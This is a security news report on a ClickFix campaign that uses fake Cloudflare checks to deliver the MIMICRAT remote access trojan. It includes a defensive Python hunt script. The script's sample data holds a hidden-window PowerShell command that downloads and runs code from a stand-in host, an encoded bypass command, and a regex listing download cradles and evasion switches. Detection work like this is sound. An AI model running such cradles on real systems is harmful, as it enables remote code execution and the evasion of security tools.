Cybersecurity researchers have uncovered a sophisticated ClickFix campaign that leverages compromised legitimate websites to distribute a newly identified remote access trojan named MIMICRAT, also referred to as AstarionRAT.
According to Elastic Security Labs, the operation demonstrates significant technical maturity. Attackers are using breached websites across various industries and regions as delivery infrastructure, deploying a multi-stage PowerShell infection chain designed to evade detection mechanisms before installing the final payload.
Multi Stage Infection Chain
The campaign begins with the compromise of legitimate websites. In one documented case, attackers breached bincheck[.]io, a legitimate Bank Identification Number validation service, and injected malicious JavaScript.
The injected script loads an external PHP file that presents victims with a fake Cloudflare verification page. Users are instructed to copy and paste a command into the Windows Run dialog, initiating the infection process.
Once executed, the PowerShell command:
- Connects to a command and control server
- Downloads a second stage PowerShell script
- Bypasses Event Tracing for Windows (ETW)
- Disables the Antimalware Scan Interface (AMSI)
- Drops a Lua-based shellcode loader
In the final stage, the Lua script decrypts and executes shellcode directly in memory, delivering the MIMICRAT payload.
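A hunt heuristic for the Run-dialog stage described above, added here as an example and not part of Elastic's report: it scans process-creation records (constructed sample data, not telemetry from the campaign) for a PowerShell host spawned directly by explorer.exe with a download cradle or evasion switch on its command line, which is the shape a pasted ClickFix command takes on an endpoint.

```python
import re

# Constructed sample process-creation records (not from the article); the
# fields mirror what Sysmon Event ID 1 / EDR process telemetry typically carries.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://verify.example.invalid/c -UseBasicParsing)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mspaint.exe",
     "cmdline": "mspaint.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -nop -ep bypass -enc SQBFAFgA"},  # constructed, truncated payload
]

SHELLS = ("powershell.exe", "pwsh.exe")
# Download cradles and evasion switches that have no business in a Run-dialog launch.
CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|invoke-expression|\biex\b|"
    r"-enc(odedcommand)?\b|-ep bypass|-w(indowstyle)? hidden|-nop)", re.I)


def is_clickfix_candidate(ev):
    """True when a PowerShell host is spawned by the desktop shell (the Win+R /
    Run-dialog path) with a cradle or evasion switch on its command line."""
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    return parent == "explorer.exe" and image in SHELLS and bool(CRADLE.search(ev["cmdline"]))


def hunt(events):
    """Return the subset of events worth an analyst's attention."""
    return [ev for ev in events if is_clickfix_candidate(ev)]


if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print("SUSPECT:", ev["cmdline"])
```

Commands typed into Win+R are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which gives a second, host-based artifact to check on any machine the heuristic flags.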
MIMICRAT Capabilities
MIMICRAT is a custom C++ remote access trojan built for post-exploitation. It communicates with its command server over HTTPS using port 443 and mimics legitimate web analytics traffic to blend into normal network activity.
The malware supports 22 commands and includes features such as:
- Windows token impersonation
- Interactive shell access
- File system manipulation
- Shellcode injection
- SOCKS5 proxy tunneling
These capabilities allow attackers to move laterally, maintain persistence, and potentially prepare the environment for ransomware deployment or data theft.
Links to Matanbuchus Activity
Researchers believe the infrastructure shares tactical overlaps with another ClickFix campaign previously documented by Huntress, which distributed the Matanbuchus 3.0 loader. In some cases, Matanbuchus served as an intermediary loader that ultimately deployed the same MIMICRAT implant.
The broader objective of the campaign is suspected to be either ransomware execution or large scale data exfiltration.
Global and Localized Targeting
Security researcher Salim Bitam noted that the lure content supports 17 languages and dynamically adjusts based on the victim’s browser settings. This localization strategy increases the campaign’s effectiveness and expands its global reach.
Identified victims include a university in the United States and several Chinese-speaking users who discussed related incidents in public forums, suggesting opportunistic but widespread targeting.